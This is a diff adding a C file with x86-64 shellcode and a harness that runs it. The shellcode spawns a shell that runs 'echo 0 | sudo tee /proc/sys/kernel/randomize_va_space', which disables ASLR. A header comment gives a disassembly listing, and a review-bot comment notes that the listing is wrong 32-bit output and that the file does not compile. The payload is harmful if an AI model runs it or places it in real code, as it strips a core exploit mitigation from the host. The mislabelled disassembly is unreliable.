+ #2030 and [eax],dh
+ #207C2073 and [eax+0x73],bh
+ #7564 jnz 0x90
+ #6F outsd
+ #20746565 and [ebp+0x65],dh
+ #202F and [edi],ch
+ #7072 jo 0xa7
+ #6F outsd
+ #632F arpl [edi],bp
+ #7379 jnc 0xb3
+ #732F jnc 0x6b
+ #6B65726E imul esp,[ebp+0x72],byte +0x6e
+ #656C gs insb
+ #2F das
+ #7261 jc 0xa6
+ #6E outsb
+ #646F fs outsd
+ #6D insd
+ #697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
+ #7370 jnc 0xc2
+ #61 popa
+ #636500 arpl [ebp+0x0],sp
+ #56 push esi
+ #57 push edi
+ #48 dec eax
+ #89E6 mov esi,esp
+ #0F05 syscall
+
+*/
+
+#include
+#include
+
+unsigned char ASLR[] = \
+"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
+"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
+"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
+"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
+"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
+"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
+"\xe6\x0f\x05";
+
+int main()
+{
+ printf("Shellcode len: %d\n", strlen(ASLR));
+
+ int (*ret)() = (int(*)())ASLR;
+
+ ret();
+
+}
\ No newline at end of file
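Review bot: `strlen(ASLR)` stops at the first NUL, and the 14th byte of the array is `\x00` (the terminator after `/bin/sh`), so `main` will print a length of 13 rather than the 93 bytes the header claims; use the array size instead, `printf("Shellcode len: %zu\n", sizeof ASLR - 1);`, which also uses the correct `%zu` conversion for a `size_t` and removes the need for `<string.h>`. Both `#include` directives have lost their header names (presumably `<stdio.h>` and `<string.h>`, swallowed as angle-bracket markup), so the file does not compile as committed. The assembly listing in the header comment was produced by a 32-bit disassembler — `48` is a REX.W prefix in 64-bit mode, not `dec eax`, and the embedded `echo 0 | sudo tee ...` string bytes are shown as instructions — so it documents the wrong instruction stream; a 64-bit disassembly, or simply the NASM source that was assembled, would be accurate. `int main()` should be `int main(void)` and return a value.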